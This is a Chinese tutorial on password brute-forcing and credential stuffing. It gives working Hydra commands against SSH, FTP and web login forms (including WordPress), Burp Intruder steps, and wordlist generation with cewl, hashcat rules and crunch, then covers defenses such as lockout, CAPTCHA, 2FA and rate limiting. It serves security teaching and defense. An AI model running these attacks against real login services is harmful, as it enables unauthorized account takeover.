1.1 纯暴力穷举#

理论上，攻击者会尝试所有可能的字符组合。假设密码只包含数字，6位长度，最多100万种组合。8位字母+数字+符号，组合数几十亿亿，纯穷举几乎不可能。

纯暴力主要用于短密码（≤6位）或者已知密码格式的情况。大部分实际攻击用的都是“字典攻击”。

1.2 字典攻击#

攻击者准备一本包含常见密码、泄露密码库、行业术语的字典文件（每行一个密码）。字典里的词可能是从历年数据泄露里整理出来的，比如rockyou.txt（1400万条密码）、SecLists的Passwords目录、以及中文常见的“123456”“888888”“admin123”等。

攻击过程：用字典里的每一个密码去试登录接口，直到成功。

1.3 撞库攻击#

攻击者从某个已经泄露的网站数据库里拿到一批用户名和密码，然后去另一个网站尝试登录。很多人所有平台用同一套密码，一个网站的数据库泄露，等于给攻击者打开了所有网站的门。

撞库是2025-2026年最常见的攻击方式之一。某知名论坛2025年底被撞库攻击，超过30万用户账号被用来发垃圾帖。

2.1 安装#

1
# Ubuntu/Debian
2
sudo apt install hydra -y
3

4
# macOS
5
brew install hydra
6

7
# 源码编译（Windows用WSL）
8
git clone https://github.com/vanhauser-thc/thc-hydra
9
cd thc-hydra
10
./configure
11
make
12
sudo make install

2.2 基本用法#

1
# SSH爆破（用户名root，密码字典pass.txt）
2
hydra -l root -P pass.txt ssh://192.168.1.100
3

4
# FTP爆破（用户字典user.txt + 密码字典pass.txt）
5
hydra -L user.txt -P pass.txt ftp://192.168.1.100
6

7
# HTTP POST登录表单爆破
8
hydra -l admin -P pass.txt 192.168.1.100 http-post-form "/login.php:username=^USER^&password=^PASS^:Login failed"

^USER^和^PASS^会被Hydra替换成字典里的用户名和密码。最后一部分是“登录失败”的错误特征字符串，Hydra根据这个判断是否成功。

2.3 实际案例：爆破WordPress登录#

WordPress默认登录地址/wp-login.php，POST参数是log和pwd，登录失败页面包含ERROR字符串。

1
hydra -L wp_users.txt -P rockyou.txt 192.168.1.100 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&redirect_to=:ERROR"

2.4 常用参数#

2.5 防御Hydra攻击#

Hydra速度快但特征明显。如果服务器配置了登录失败次数限制（比如连续5次失败封IP 15分钟），Hydra的几十万次尝试会被瞬间阻断。加上验证码或延迟响应，Hydra基本废了。

3.1 步骤#

1. 打开Burp，浏览器设置代理127.0.0.1:8080
2. 在登录页面输入任意用户名密码，点击登录
3. 在Burp Proxy里找到这个POST请求，右键Send to Intruder
4. 进入Intruder → Positions，清空payload标记，把用户名和密码的值加上§标记
5. 选择Attack type：Cluster bomb（同时爆破用户名和密码）或Sniper（单变量）
6. Payloads：用户字典加载user.txt，密码字典加载pass.txt
7. 在Options → Grep - Extract里添加“登录成功”的特征字符串（比如Welcome或dashboard）
8. 点击Start attack，等待结果

3.2 应对防重放Token#

有些登录表单有CSRF Token或随机隐藏字段，每次请求都变化。Intruder需要先发一个GET请求拿到Token，再在POST里动态替换。

解决方案：使用Burp的宏或Turbo Intruder插件编写脚本。

4.1 基于个人信息生成（cewl）#

cewl可以爬取目标网站，提取页面里的单词，自动生成自定义字典。

1
# 爬取公司官网，生成字典
2
cewl -d 2 -m 5 https://example.com -w dict.txt
3
# -d 深度，-m 最小单词长度

4.2 规则组合（hashcat + rule）#

利用已知密码加上变形规则生成更丰富的字典。hashcat自带几十条规则（追加数字、替换字母、大小写变换等）。

1
# 用base.txt作为基础字典，应用best64规则生成新字典
2
hashcat --stdout -r /usr/share/hashcat/rules/best64.rule base.txt > final_dict.txt

常用规则示例：

• $1 在末尾加1
• $2$0$1$9 加2019
• c 首字母大写
• t 变换大小写
• d 复制单词并大写

4.3 合并泄露数据库#

从公开数据泄露集中提取常见的用户名和密码组合。比如SecLists仓库里的Usernames/top-usernames-shortlist.txt和Passwords/Common-Credentials/10-million-password-list-top-1000.txt。

4.4 中文拼音与生日字典#

针对国内网站，可以生成拼音词典（例如zhangsan、lisi、wangwu）和生日字典（19900101、900101）。使用crunch工具可以按规则生成。

1
# 生成所有8位数字组合（太大会爆炸，慎用）
2
crunch 8 8 0123456789 -o 8digits.txt
3

4
# 生成前缀+数字，比如admin001~admin999
5
crunch 6 8 -t admin@@@ -o admin_dict.txt

5.1 登录失败次数限制#

最简单的防御。连续5次登录失败，锁定账号15分钟或要求输入验证码。

注意：不要返回“用户名不存在”或“密码错误”这种区分信息，统一返回“用户名或密码错误”，防止攻击者枚举用户名。

5.2 验证码（CAPTCHA）#

图形验证码、滑块验证、算术验证码都能有效阻挡自动化工具。注意验证码必须有足够的复杂度（比如干扰线、变形字体），且每个请求只能使用一次。2026年已有AI可以轻松破解简单验证码，建议使用服务商的滑块或行为验证。

5.3 双因素认证（2FA）#

即使密码被爆破，攻击者没有第二因素（手机验证码、TOTP、硬件密钥）也无法登录。这是目前最可靠的防御手段。

5.4 延迟响应#

无论密码是否正确，登录接口都固定延迟2秒返回。攻击者原来每秒能试100次，现在每秒0.5次，效率被压到1/200。

5.5 封禁IP与限流#

同一IP短时间内请求登录接口超过阈值（比如每分钟20次），自动封禁该IP 1小时。但攻击者可以用代理池绕过，需要配合其他手段。

5.6 强制使用强密码#

注册时要求密码长度≥8位，包含大小写字母、数字、特殊符号。定期检测用户密码是否在公开泄露库中，如果是则强制修改。

5.7 监控与告警#

配置登录失败率突增的告警，当某个用户或某IP失败次数异常时，立即触发临时封禁并通知管理员。